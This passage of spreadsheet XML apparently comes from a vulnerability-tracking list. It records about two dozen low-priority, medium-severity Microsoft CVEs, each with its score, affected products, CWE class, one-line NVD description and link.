t="inlineStr" /><c r="J1636" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1636" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1636" s="5" t="inlineStr" /><c r="M1636" s="5" t="inlineStr" /><c r="N1636" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1636" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1636" s="5" t="inlineStr" /><c r="Q1636" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1636" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1636" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68780</t></is></c></row><row r="1637"><c r="A1637" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1637" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1637" s="5" t="inlineStr"><is><t>CVE-2026-68781</t></is></c><c r="D1637" s="5" t="n"><v>6.5</v></c><c r="E1637" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1637" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1637" s="5" t="inlineStr" /><c r="H1637" s="5" t="n"><v>0.007</v></c><c r="I1637" s="5" t="inlineStr" /><c r="J1637" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1637" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1637" s="5" t="inlineStr" /><c r="M1637" s="5" t="inlineStr" /><c r="N1637" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1637" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1637" s="5" t="inlineStr" /><c r="Q1637" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1637" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1637" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68781</t></is></c></row><row r="1638"><c r="A1638" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1638" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1638" s="5" t="inlineStr"><is><t>CVE-2026-68784</t></is></c><c r="D1638" s="5" t="n"><v>6.5</v></c><c r="E1638" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1638" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1638" s="5" t="inlineStr" /><c r="H1638" s="5" t="n"><v>0.007</v></c><c r="I1638" s="5" t="inlineStr" /><c r="J1638" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1638" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1638" s="5" t="inlineStr" /><c r="M1638" s="5" t="inlineStr" /><c r="N1638" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1638" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1638" s="5" t="inlineStr" /><c r="Q1638" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1638" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1638" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68784</t></is></c></row><row r="1639"><c r="A1639" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1639" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1639" s="5" t="inlineStr"><is><t>CVE-2026-68898</t></is></c><c r="D1639" s="5" t="n"><v>6.5</v></c><c r="E1639" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1639" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1639" s="5" t="inlineStr" /><c r="H1639" s="5" t="n"><v>0.006</v></c><c r="I1639" s="5" t="inlineStr" /><c r="J1639" s="5" t="inlineStr" /><c r="K1639" s="5" t="inlineStr" /><c r="L1639" s="5" t="inlineStr" /><c r="M1639" s="5" t="inlineStr" /><c r="N1639" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1639" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1639" s="5" t="inlineStr" /><c r="Q1639" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1639" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows iSCSI allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1639" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68898</t></is></c></row><row r="1640"><c r="A1640" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1640" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1640" s="5" t="inlineStr"><is><t>CVE-2026-69267</t></is></c><c r="D1640" s="5" t="n"><v>6.5</v></c><c r="E1640" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1640" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1640" s="5" t="inlineStr" /><c r="H1640" s="5" t="n"><v>0.003</v></c><c r="I1640" s="5" t="inlineStr" /><c r="J1640" s="5" t="inlineStr" /><c r="K1640" s="5" t="inlineStr" /><c r="L1640" s="5" t="inlineStr" /><c r="M1640" s="5" t="inlineStr" /><c r="N1640" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1640" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1640" s="5" t="inlineStr" /><c r="Q1640" s="5" t="inlineStr"><is><t>CWE-1220</t></is></c><c r="R1640" s="5" t="inlineStr"><is><t>Insufficient granularity of access control in Windows Connected User Experiences and Telemetry allows an authorized attacker to disclose information locally.</t></is></c><c r="S1640" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69267</t></is></c></row><row r="1641"><c r="A1641" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1641" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1641" s="5" t="inlineStr"><is><t>CVE-2026-69297</t></is></c><c r="D1641" s="5" t="n"><v>6.5</v></c><c r="E1641" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1641" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1641" s="5" t="inlineStr" /><c r="H1641" s="5" t="n"><v>0.006</v></c><c r="I1641" s="5" t="inlineStr" /><c r="J1641" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1641" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1641" s="5" t="inlineStr" /><c r="M1641" s="5" t="inlineStr" /><c r="N1641" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1641" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1641" s="5" t="inlineStr" /><c r="Q1641" s="5" t="inlineStr"><is><t>CWE-257</t></is></c><c r="R1641" s="5" t="inlineStr"><is><t>Storing passwords in a recoverable format in Windows DHCP Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1641" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69297</t></is></c></row><row r="1642"><c r="A1642" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1642" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1642" s="5" t="inlineStr"><is><t>CVE-2026-69361</t></is></c><c r="D1642" s="5" t="n"><v>6.5</v></c><c r="E1642" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1642" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1642" s="5" t="inlineStr" /><c r="H1642" s="5" t="n"><v>0.008</v></c><c r="I1642" s="5" t="inlineStr" /><c r="J1642" s="5" t="inlineStr" /><c r="K1642" s="5" t="inlineStr" /><c r="L1642" s="5" t="inlineStr" /><c r="M1642" s="5" t="inlineStr" /><c r="N1642" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1642" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1642" s="5" t="inlineStr" /><c r="Q1642" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R1642" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Microsoft Exchange Server allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="S1642" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69361</t></is></c></row><row r="1643"><c r="A1643" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1643" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1643" s="5" t="inlineStr"><is><t>CVE-2026-69374</t></is></c><c r="D1643" s="5" t="n"><v>6.5</v></c><c r="E1643" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1643" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1643" s="5" t="inlineStr" /><c r="H1643" s="5" t="n"><v>0.011</v></c><c r="I1643" s="5" t="inlineStr" /><c r="J1643" s="5" t="inlineStr" /><c r="K1643" s="5" t="inlineStr" /><c r="L1643" s="5" t="inlineStr" /><c r="M1643" s="5" t="inlineStr" /><c r="N1643" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1643" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1643" s="5" t="inlineStr" /><c r="Q1643" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="R1643" s="5" t="inlineStr"><is><t>Allocation of resources without limits or throttling in Windows SMB Server allows an authorized attacker to deny service over a network.</t></is></c><c r="S1643" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69374</t></is></c></row><row r="1644"><c r="A1644" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1644" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1644" s="5" t="inlineStr"><is><t>CVE-2026-69375</t></is></c><c r="D1644" s="5" t="n"><v>6.5</v></c><c r="E1644" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1644" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1644" s="5" t="inlineStr" /><c r="H1644" s="5" t="n"><v>0.006</v></c><c r="I1644" s="5" t="inlineStr" /><c r="J1644" s="5" t="inlineStr" /><c r="K1644" s="5" t="inlineStr" /><c r="L1644" s="5" t="inlineStr" /><c r="M1644" s="5" t="inlineStr" /><c r="N1644" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1644" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1644" s="5" t="inlineStr" /><c r="Q1644" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R1644" s="5" t="inlineStr"><is><t>Authorization bypass through user-controlled key in Microsoft Exchange Server allows an authorized attacker to perform tampering over a network.</t></is></c><c r="S1644" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69375</t></is></c></row><row r="1645"><c r="A1645" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1645" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1645" s="5" t="inlineStr"><is><t>CVE-2026-69395</t></is></c><c r="D1645" s="5" t="n"><v>6.5</v></c><c r="E1645" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1645" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1645" s="5" t="inlineStr" /><c r="H1645" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1645" s="5" t="inlineStr" /><c r="J1645" s="5" t="inlineStr" /><c r="K1645" s="5" t="inlineStr" /><c r="L1645" s="5" t="inlineStr" /><c r="M1645" s="5" t="inlineStr" /><c r="N1645" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1645" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1645" s="5" t="inlineStr" /><c r="Q1645" s="5" t="inlineStr"><is><t>CWE-134</t></is></c><c r="R1645" s="5" t="inlineStr"><is><t>Use of externally-controlled format string in Active Directory Certificate Services (AD CS) allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1645" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69395</t></is></c></row><row r="1646"><c r="A1646" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1646" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1646" s="5" t="inlineStr"><is><t>CVE-2026-69409</t></is></c><c r="D1646" s="5" t="n"><v>6.5</v></c><c r="E1646" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1646" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1646" s="5" t="inlineStr" /><c r="H1646" s="5" t="n"><v>0.01</v></c><c r="I1646" s="5" t="inlineStr" /><c r="J1646" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1646" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1646" s="5" t="inlineStr" /><c r="M1646" s="5" t="inlineStr" /><c r="N1646" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1646" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1646" s="5" t="inlineStr" /><c r="Q1646" s="5" t="inlineStr"><is><t>CWE-250</t></is></c><c r="R1646" s="5" t="inlineStr"><is><t>Execution with unnecessary privileges in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1646" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69409</t></is></c></row><row r="1647"><c r="A1647" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1647" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1647" s="5" t="inlineStr"><is><t>CVE-2026-69497</t></is></c><c r="D1647" s="5" t="n"><v>6.5</v></c><c r="E1647" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1647" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1647" s="5" t="inlineStr" /><c r="H1647" s="5" t="n"><v>0.011</v></c><c r="I1647" s="5" t="inlineStr" /><c r="J1647" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1647" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1647" s="5" t="inlineStr" /><c r="M1647" s="5" t="inlineStr" /><c r="N1647" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1647" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1647" s="5" t="inlineStr" /><c r="Q1647" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="R1647" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Windows DHCP Server allows an authorized attacker to deny service over a network.</t></is></c><c r="S1647" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69497</t></is></c></row><row r="1648"><c r="A1648" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1648" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1648" s="5" t="inlineStr"><is><t>CVE-2026-69562</t></is></c><c r="D1648" s="5" t="n"><v>6.5</v></c><c r="E1648" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1648" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1648" s="5" t="inlineStr" /><c r="H1648" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1648" s="5" t="inlineStr" /><c r="J1648" s="5" t="inlineStr" /><c r="K1648" s="5" t="inlineStr" /><c r="L1648" s="5" t="inlineStr" /><c r="M1648" s="5" t="inlineStr" /><c r="N1648" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1648" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1648" s="5" t="inlineStr" /><c r="Q1648" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1648" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1648" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69562</t></is></c></row><row r="1649"><c r="A1649" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1649" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1649" s="5" t="inlineStr"><is><t>CVE-2026-69624</t></is></c><c r="D1649" s="5" t="n"><v>6.5</v></c><c r="E1649" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1649" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1649" s="5" t="inlineStr" /><c r="H1649" s="5" t="n"><v>0.007</v></c><c r="I1649" s="5" t="inlineStr" /><c r="J1649" s="5" t="inlineStr" /><c r="K1649" s="5" t="inlineStr" /><c r="L1649" s="5" t="inlineStr" /><c r="M1649" s="5" t="inlineStr" /><c r="N1649" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1649" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1649" s="5" t="inlineStr" /><c r="Q1649" s="5" t="inlineStr"><is><t>CWE-184</t></is></c><c r="R1649" s="5" t="inlineStr"><is><t>Incomplete list of disallowed inputs in Active Directory Certificate Services (AD CS) allows an authorized attacker to perform tampering over a network.</t></is></c><c r="S1649" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69624</t></is></c></row><row r="1650"><c r="A1650" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1650" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1650" s="5" t="inlineStr"><is><t>CVE-2026-69626</t></is></c><c r="D1650" s="5" t="n"><v>6.5</v></c><c r="E1650" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1650" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1650" s="5" t="inlineStr" /><c r="H1650" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1650" s="5" t="inlineStr" /><c r="J1650" s="5" t="inlineStr" /><c r="K1650" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1650" s="5" t="inlineStr" /><c r="M1650" s="5" t="inlineStr" /><c r="N1650" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1650" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1650" s="5" t="inlineStr" /><c r="Q1650" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="R1650" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1650" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69626</t></is></c></row><row r="1651"><c r="A1651" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1651" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1651" s="5" t="inlineStr"><is><t>CVE-2026-69636</t></is></c><c r="D1651" s="5" t="n"><v>6.5</v></c><c r="E1651" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1651" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1651" s="5" t="inlineStr" /><c r="H1651" s="5" t="n"><v>0.01</v></c><c r="I1651" s="5" t="inlineStr" /><c r="J1651" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1651" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1651" s="5" t="inlineStr" /><c r="M1651" s="5" t="inlineStr" /><c r="N1651" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1651" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1651" s="5" t="inlineStr" /><c r="Q1651" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R1651" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1651" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69636</t></is></c></row><row r="1652"><c r="A1652" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1652" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1652" s="5" t="inlineStr"><is><t>CVE-2026-69719</t></is></c><c r="D1652" s="5" t="n"><v>6.5</v></c><c r="E1652" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1652" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1652" s="5" t="inlineStr" /><c r="H1652" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1652" s="5" t="inlineStr" /><c r="J1652" s="5" t="inlineStr" /><c r="K1652" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1652" s="5" t="inlineStr" /><c r="M1652" s="5" t="inlineStr" /><c r="N1652" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1652" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1652" s="5" t="inlineStr" /><c r="Q1652" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="R1652" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1652" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69719</t></is></c></row><row r="1653"><c r="A1653" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1653" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1653" s="5" t="inlineStr"><is><t>CVE-2026-69734</t></is></c><c r="D1653" s="5" t="n"><v>6.5</v></c><c r="E1653" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1653" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1653" s="5" t="inlineStr" /><c r="H1653" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1653" s="5" t="inlineStr" /><c r="J1653" s="5" t="inlineStr" /><c r="K1653" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1653" s="5" t="inlineStr" /><c r="M1653" s="5" t="inlineStr" /><c r="N1653" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1653" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1653" s="5" t="inlineStr" /><c r="Q1653" s="5" t="inlineStr"><is><t>CWE-125, CWE-190</t></is></c><c r="R1653" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1653" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69734</t></is></c></row><row r="1654"><c r="A1654" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1654" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1654" s="5" t="inlineStr"><is><t>CVE-2026-69781</t></is></c><c r="D1654" s="5" t="n"><v>6.5</v></c><c r="E1654" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1654" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1654" s="5" t="inlineStr" /><c r="H1654" s="5" t="n"><v>0.005</v></c><c r="I1654" s="5" t="inlineStr" /><c r="J1654" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1654" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1654" s="5" t="inlineStr" /><c r="M1654" s="5" t="inlineStr" /><c r="N1654" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1654" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1654" s="5" t="inlineStr" /><c r="Q1654" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="R1654" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Windows DHCP Client allows an unauthorized attacker to deny service over an adjacent network.</t></is></c><c r="S1654" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69781</t></is></c></row><row r="1655"><c r="A1655" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1655" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1655" s="5" t="inlineStr"><is><t>CVE-2026-69839</t></is></c><c r="D1655" s="5" t="n"><v>6.5</v></c><c r="E1655" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1655" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1655" s="5" t="inlineStr" /><c r="H1655" s="5" t="n"><v>0.011</v></c><c r="I1655" s="5" t="inlineStr" /><c r="J1655" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1655" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1655" s="5" t="inlineStr" /><c r="M1655" s="5" t="inlineStr" /><c r="N1655" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1655" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1655" s="5" t="inlineStr" /><c r="Q1655" s="5" t="inlineStr"><is><t>CWE-248</t></is></c><c r="R1655" s="5" t="inlineStr"><is><t>Uncaught exception in Windows iSCSI Target Service allows an authorized attacker to deny service over a network.</t></is></c><c r="S1655" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69839</t></is></c></row><row r="1656"><c r="A1656" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1656" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1656" s="5" t="inlineStr"><is><t>CVE-2026-69855</t></is></c><c r="D1656" s="5" t="n"><v>6.5</v></c><c r="E1656" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1656" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1656" s="5" t="inlineStr" /><c r="H1656" s="5" t="n"><v>0.005</v></c><c r="I1656" s="5" t="inlineStr" /><c r="J1656" s="5" t="inlineStr" /><c r="K1656" s="5" t="inlineStr"><is><t>microsoft:azure_copilot</t></is></c><c r="L1656" s="5" t="inlineStr" /><c r="M1656" s="5" t="inlineStr" /><c r="N1656" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1656" s="5" t="inlineStr"><is><t>2026-08-20</t></is></c><c r="P1656" s="5" t="inlineStr" /><c r="Q1656" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R1656" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Microsoft Copilot in Azure allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1656" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69855</t></is></c></row><row r="1657"><c r="A1657" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1657" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1657" s="5" t="inlineStr"><is><t>CVE-2026-70019</t></is></c><c r="D1657" s="5" t="n"><v>6.5</v></c><c r="E1657" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1657" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1657" s="5" t="inlineStr" /><c r="H1657" s="5" t="n"><v>0.011</v></c><c r="I1657" s="5" t="inlineStr" /><c r="J1657" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1657" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1657" s="5" t="inlineStr" /><c r="M1657" s="5" t="inlineStr" /><c r="N1657" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1657" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1657" s="5" t="inlineStr" /><c r="Q1657" s="5" t="inlineStr"><is><t>CWE-65</t></is></c><c r="R1657" s="5" t="inlineStr"><is><t>Windows hard link in Windows Compressed Folder allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1657" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70019</t></is></c></row><row r="1658"><c r="A1658" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1658" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1658" s="5" 